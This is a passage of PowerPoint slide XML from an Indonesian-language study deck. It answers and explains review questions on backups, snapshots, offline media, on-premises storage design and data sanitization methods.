              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Snapshot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>virtual machines (VMs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VMware, Hyper-V, VirtualBox) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>storage systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAN/NAS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rollback </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> update, patching, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. True or false? Backup media can be on site, but offline.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>True.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Backup media (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: tape, external hard drive) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (on-site) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (offline).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>offline media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>diserang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> ransomware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. You are advising a company about backup requirements for a few dozen application servers hosting tens of terabytes of data. The company requires online availability of short-term backups, plus off-site security media and long-term archive storage. The company cannot use a cloud solution. What type of on-premises storage solution is best suited to the requirement?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Hybrid storage solution combining NAS/SAN for short-term backups and tape library for long-term/off-site archiving.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Short-term, online backups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SAN (Storage Area Network)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>NAS (Network Attached Storage)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Off-site and long-term archives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>tape backups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Karena cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbolehkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>on-prem + tape library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>5. Define data sanitization.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Data sanitization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>permanen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> forensic tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "delete" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pointer file).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Metode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Clearing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Purging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tools/software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Physical destruction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghancurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media (shredding, degaussing, melting).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tujuannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebocoran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
